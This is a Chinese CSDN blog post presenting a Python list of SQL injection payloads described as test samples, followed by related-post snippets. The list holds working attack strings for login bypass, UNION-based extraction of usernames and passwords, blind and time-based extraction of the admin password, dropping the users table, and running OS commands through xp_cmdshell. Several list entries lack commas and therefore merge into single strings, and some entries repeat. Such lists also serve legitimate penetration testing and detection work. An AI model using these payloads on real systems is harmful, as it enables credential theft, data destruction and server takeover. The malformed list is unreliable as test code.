SQL注入样本

已于 2024-08-01 16:15:51 修改
阅读量691 收藏 19
点赞数 10
文章标签: sql 数据库 oracle
于 2024-07-29 16:15:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45631123/article/details/140773942
版权

SQL 注入测试样本列表

SQL_INJECTION_PAYLOADS = [
    "'",  # 单引号引发基本的 SQL 错误
    '"',  # 双引号引发基本的 SQL 错误
    "' OR '1'='1' --",  # 典型的真语句注入
    "' OR '1'='1' /*",  # 使用注释符号进行注入
    "' OR 1=1 --",  # 另一种基本的真语句注入
    "' OR 1=1 /*",  # 另一种基本的真语句注入,使用评论
    "' UNION SELECT NULL, username, password FROM users --",  # 使用 UNION 查询
    "' UNION SELECT 1, @@version --",  # 获取数据库版本
    "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --",  # 字符串获取
    "' HAVING 1=1 --",  # HAVING 子句测试
    "'; DROP TABLE users; --",  # 尝试删除表 (仅供测试目的,切勿在生产环境中执行)
    "'; EXEC xp_cmdshell('whoami'); --",  # SQL Server 命令执行
    "'; SELECT * FROM information_schema.tables; --",  # 获取表信息
    "' AND 1=(SELECT COUNT(*) FROM users) --",  # 计数测试
    "'; SELECT concat(username, ':', password) FROM users --",  # 获取用户名和密码组合
    "'; WAITFOR DELAY '0:0:5'; --",  # 基于延迟的盲注测试
    "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --",  # 使用 CASE 语句
    "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --",  # 多个 NULL 测试
    "' AND EXISTS(SELECT * FROM users WHERE username='admin') --",  # 检查用户是否存在
    "'; SELECT @@datadir; --",  # 获取数据库目录信息
    "' AND ascii(substring((SELECT password FROM users WHERE username='admin'),1,1)) > 100 --",  # 通过字符编码进行盲注
    "'; WAITFOR DELAY \'0:0:10\' --'"
    "' AND 1=1 /* OR 1=2 */"
    "' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema = database() --"
    "' AND (SELECT ASCII(SUBSTRING((SELECT column_name FROM table_name LIMIT 0,1), 1, 1)) = 104) --"
    "' UNION SELECT NULL, (SELECT column_name FROM table_name) --"
    "' UNION SELECT NULL, (SELECT column_name FROM table_name) --"
    "' AND (SELECT CAST(1 AS CHAR) FROM DUAL) --"
    "' AND (SELECT 1) AND (SELECT 2) --"
    # 基本真语句注入
    "' OR '1'='1' --",  # 总是为真,用于绕过身份验证
    "' OR 1=1 --",  # 相同的逻辑

    # 注释和空值注入
    "' OR 1=1 /*",  # 使用注释,确保后续的 SQL 不被执行
    "' OR 1=1 #",  # 使用 # 注释
    "' OR   1=1   --",  # 多余的空格

    # UNION 查询
    "' UNION SELECT NULL, username, password FROM users --",  # 从 users 表获取用户名和密码
    "' UNION SELECT NULL, table_name FROM information_schema.tables --",  # 获取数据库表
    "' UNION SELECT username, password FROM users WHERE '1' = '1' --",  # 提取用户凭据
    "' UNION SELECT 1, database() --",  # 获取当前数据库名称
    "' UNION SELECT NULL, COUNT(*) FROM users --",  # 获取用户表的行数

    # 盲注
    "' AND 1=(SELECT COUNT(*) FROM users) --",  # 计数测试
    "' AND (SELECT SUBSTRING(@@version,1,1)) = '5' --",  # 检测数据库版本
    "'; WAITFOR DELAY '0:0:5'; --",  # 延迟盲注

    # 存储过程注入
    "'; EXEC xp_cmdshell('whoami'); --",  # SQL Server 命令执行
    "'; EXECUTE IMMEDIATE 'DROP TABLE users'; --",  # 动态执行命令 (仅供测试)

    # 信息获取
    "'; SELECT @@datadir; --",  # 获取数据库目录信息
    "'; SELECT GROUP_CONCAT(username) FROM users; --",  # 获取所有用户名的连接字符串
    "'; SELECT * FROM information_schema.columns WHERE table_name='users'; --",  # 获取用户表的列信息

    # 逻辑测试
    "' AND 1=(SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END FROM users LIMIT 1) --",  # 验证特定用户
    "' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin')='a' --",  # 验证密码字符

    # 错误基注入
    "' AND 1=CONVERT(int, (SELECT @@version)) --",  # 强制类型转换测试
    "' AND 1=(SELECT TOP 1 NULL FROM users) --",  # 检查 NULL 值

    # 模糊查询
    "' AND (SELECT username FROM users WHERE username LIKE 'ad%') IS NOT NULL --",  # 模糊匹配查询

    # SQL 注入的变体
    "' AND NOT EXISTS(SELECT * FROM users WHERE username='admin') --",  # 检查特定用户不在表中
    "' AND 1 IN (SELECT COUNT(*) FROM users) --",  # 在子查询中进行计数

    # 多个 NULL 测试
    "' UNION SELECT NULL, NULL, NULL --",  # 测试多个 NULL 值
    "' UNION SELECT NULL, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) --",
    # 获取用户表的第一列名称

    # 其他注入形式
    "' AND (SELECT CAST(1 AS CHAR) FROM dual) --",  # 测试 SQL 语法
    "'; SELECT 1; --",  # 简易测试,返回 1

    # 基于时间的盲注
    "'; IF(1=1) WAITFOR DELAY '0:0:5' --",  # 基于条件的延迟
    "'; IF NOT EXISTS (SELECT * FROM users) WAITFOR DELAY '0:0:10' --",  # 基于用户存在性的延迟

    # 布尔盲注示例
    "' AND (SELECT 1) = 1 --",  # 确定条件是否为真
    "' AND (SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END) = 1 --",  # 检查是否存在特定用户
    "' AND (SELECT LENGTH(password) FROM users WHERE username='admin') > 5 --",  # 检查密码长度

    # 时间盲注示例
    "'; IF((SELECT username FROM users WHERE username='admin') = 'admin') WAITFOR DELAY '0:0:5' --",  # 如果条件成立,则延迟
    "'; IF((SELECT COUNT(*) FROM users) > 0) WAITFOR DELAY '0:0:5' --",  # 检查用户表是否有记录并延迟
    "'; DECLARE @result INT; SET @result = (SELECT COUNT(*) FROM users); IF @result = 1 WAITFOR DELAY '0:0:5' --",
    # 使用变量进行延迟

    # 试探其他表
    "' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database() --",  # 获取当前数据库的所有表名
    "' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' --",  # 获取用户表中的所有列名

    # 动态查询注入
    "'; DECLARE @sql NVARCHAR(MAX); SET @sql = 'SELECT * FROM users'; EXEC sp_executesql @sql; --",  # 使用动态SQL查询
    "'; SET @sql = 'DROP TABLE users'; EXEC(@sql); --",  # 动态执行 DROP TABLE 命令

    # 基于二进制的注入
    "' AND ASCII(SUBSTRING((SELECT TOP 1 password FROM users WHERE username='admin'), 1, 1)) = 97 --",
    # 验证第一个字符是否为 'a'
    "' AND LENGTH(username) = 5 --",  # 检查用户名长度是否为5
    "' AND (SELECT CASE WHEN (SELECT password FROM users WHERE username='admin') LIKE 'a%' THEN 1 ELSE 0 END) = 1 --",
    # 如果密码以 'a' 开头

]
来自于狂人
关注
SQL注入基础样例1
qq_49283465的博客
05-02 584
其次我们尝试通过字符转义、传入大数id=50000000等各种方式来使其报错—此处表示你已经过了waf(即使你不会),我们观察他的闭合方式,诱导语句闭合并使用- -+把后面语句注释掉。小知识:我们要知道SQL语句的闭合方式:无符号闭合、单引号—‘’、双引号—“”、单引号与括号联动—‘)、双引号与括号联动—“)、单引号括号双引号—‘)“、以及搜索语句中—‘%’闭合。攻击方式:报错注入、union联合注入、布尔盲注、时间盲注、http头注入、宽字节注入(中国网站)、文件注入、DNS注入等。
sql注入--10http头注入
技术骨干小李的博客
07-27 649
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都会自动完成,并且可能使用不
基于错误的的sql注入模版(post)
weixin_30517001的博客
05-09 244
一、报错分析riaDBserverversionfortherightsyntaxtousenear'))"andpassword=""LIMIT0,1'atline1 syntaxtousenear'"""andpassword=""LIMIT0,1'atline1基于双引号二、分析类型。万能登录成功三、没有回显位。估计应该是基于错误的注释。1、正确答案(勿改动)数据库名uname=123...
sql注入
pmt123456的博客
10-02 316
1.基本步骤 https://www.jianshu.com/p/078df7a35671 例题:“百度杯”CTF比赛 九月场SQL tips:用<>绕过敏感词过滤 1.得到数据库名称为sqli http://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,database(),3 2.得到表明为info htt
SQL注入
zhaji001
09-25 308
解释型语言和编译型语言: 解释型语言:运行是由一个运行时组件解释语言代码并执行其中包含的指令语言. 编译型语言:是由它的代码在生成可执行文件时换转成机器指令,然后在运行时直接由该语言的计算机处理器执行指令. 从理论上讲,任何语言都可使用编译器或解释器或来执行,这种区别不是语言本身的内在特性,通常大多数语言仅通过上述其中一种方式执行.基于解释型语言的执行方式,产生了一系列叫做代码注入的漏洞. ...
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 1575
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
DeepSQLi用于测试SQL注入的深度语义学习.zip
04-03
1. 数据收集:DeepSQLi首先需要大量的SQL注入样本,包括正常查询和恶意注入,以训练深度学习模型。 2. 特征工程:提取SQL语句的关键特征,如关键字、操作符、字符串等,为深度学习模型提供输入。 3. 模型构建:使用...
SQL注入认识
weixin_47306547的博客
09-14 607
目录 SQL简介 SQL注入 漏洞原理 SQL注入原理 注入点可能存在的位置 SQL注入特点 SQL注入漏洞危害 SQL注入漏洞检测 SQL注入分类 根据注入点类型分类 根据数据提交方式分类 根据注入手法分类 MySQL数据库结构 SQL注入流程及思路 sql注入漏洞防护 SQL注入练习 SQL简介 Structured Query Language 是一种特殊的变成语言,用于数据库的标准数据查询语言。 有明显的层次结构...
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
sql注入第一次实战
strwolf的专栏
03-31 1451
0x00. 光看书想睡觉,所以打算还是找个实际的环境来练练手。 0x01. 寻找目标:去wooyun看了666个政府网站的注入点,所以很受启发,随便用一个点google一下,再在结果中随便找了一个 0x02. 确认是否存在SQL注入漏洞:参数本身是id=7,乍一看是数值参数,直接?id=7 and 1=2页面正常返回,猜测参数被单引号包围,尝试用单引号去闭合?id=7' and 1=2--%2
SQL注入】小白手把手入门SQL注入1-数据库基础
记录并分享学习安全的知识点..
02-18 1181
数据库是“按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。关系型数据库关系型数据库是基于关系模型的数据库系统,使用表格(表)来组织数据数据以行和列的形式存储在表中,每个表代表一个实体或关系,每一行表示一个数据记录,每一列表示记录的属性。关系型数据库使用结构化查询语言(SQL)进行数据的查询和操作。关系型数据库中表与表之间是有很多复杂的关联关系的常见的关系型数据库有等。非关系型数据库
sql注入实例
weixin_45901902的博客
11-11 4826
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就通过这个实例来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下: 1 SELECT*FromTableWHEREName...
SQL注入案例演示与防范措施大全
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
SQL注入手工注入常用的语句
yusakul的博客
11-19 2481
判断是否存在注入 and 1=1 / and 1=2 回显页面不同(整形判断) 输入and 1=1和and 1=2后发现页面没有变化,判断不是整型注入 输入’ and 1=1 %23和 ’ and 1=2%23后发现页面变化,判断为字符注入数据库中 1=1 和1=2 后面随便输入字符串(相当于1=1和1=2后面的查询语句),发现select 1=&quot;1dasd&quot;时返回1正确,1=&quot;2das...
震惊!sql注入 的格式居然被他爆了出来,按照这个格式,新手入侵网站变成可能?!(作者自用格式)
xuchen16的博客
10-08 819
转载自:https://blog.csdn.net/qq_42777804/article/details/81226567 判断是否存在注入 id=1’ 异常 id=1’ and 1=1%23 正确 id=1’ and 1=2%23 错误 说明存在单引号字符型SQL注入 都错误的话,可以尝试数字型,双引号,括号型 2.求列数 id = 1 order by 4%23 正常 Id ...
SQL注入&WAF绕过姿势
热门推荐
4ct10n
03-02 2万+
# 1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄
使用Keras进行SQL注入检测的深度学习实践
"这篇教程介绍了如何使用深度学习框架Keras来判断SQL注入攻击。通过创建一个神经网络模型,对输入的INT型数据进行处理,利用正向和反向计算,结合SOFTMAX进行多分类概率计算,区分正常文本与含有SQL注入的文本。教程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值